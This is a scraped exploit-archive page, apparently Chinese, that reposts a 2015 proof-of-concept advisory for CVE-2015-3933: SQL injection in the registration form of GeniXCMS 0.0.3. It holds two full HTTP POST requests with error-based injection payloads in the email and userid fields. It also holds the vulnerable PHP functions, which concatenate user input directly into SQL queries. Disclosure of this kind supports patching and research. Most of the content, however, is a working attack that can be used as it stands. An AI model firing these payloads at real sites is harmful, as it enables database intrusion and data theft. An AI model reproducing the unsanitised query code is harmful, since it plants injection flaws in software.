扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 |
# Exploit Title: Genixcms register.php multiple SQL vuln # Date: 2015-06-23 # Exploit Author: cfreer (poc-lab) # Vendor Homepage:http://www.genixcms.org # Software Link: https://codeload.github.com/semplon/GeniXCMS/zip/master/GeniXCMS-master.zip # Version: 0.0.3 # Tested on: Apache/2.4.7 (Win32) # CVE : CVE-2015-3933 ===================== SOFTWARE DESCRIPTION ===================== Free and Opensource Content Management System, a new approach of simple and lightweight CMS. Get a new experience of a fast and easy to modify CMS. ============================= VULNERABILITY: SQL Injection ============================= Poc: 1、Genixcms register.php email SQL vuln HTTP Data Stream POST /genixcms/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 199 email='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and'&pass1=cfreer&pass2=cfreer®ister=1&token=&userid=poc-lab \inc\lib\User.class.php public static function is_email($vars){ if(isset($_GET['act']) && $_GET['act'] == 'edit'){ $where = "AND <code>id</code> != '{$_GET['id']}' "; }else{ $where = ''; } $e = Db::result("SELECT * FROM <code>user</code> WHERE <code>email</code> = '{$vars}' {$where}"); if(Db::$num_rows > 0){ return false; }else{ return true; } } ============================================================================================================================================== 2、Genixcms register.php userid SQL vuln HTTP Data Stream POST /genixcms/register.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Cookie: ECS[visit_times]=4; iAv6_2132_saltkey=JLrHe7OQ; PHPSESSID=r7o8e5rghc0n0j09i6drb4m9v6; GeniXCMS=8fq1peiv9lahvq3d1qlfab7g47 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 224 email=websec@poc-lab.org&pass1=poc-lab.org&pass2=poc-lab.org®ister=1&token=&userid='and(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)and' \inc\lib\User.class.php public static function is_exist($user) { if(isset($_GET['act']) && $_GET['act'] == 'edit'){ $where = "AND <code>id</code> != '{$_GET['id']}' "; }else{ $where = ''; } $usr = Db::result("SELECT <code>userid</code> FROM <code>user</code> WHERE <code>userid</code> = '{$user}' {$where} "); $n = Db::$num_rows; if($n > 0 ){ return false; }else{ return true; } } |
体验盒子
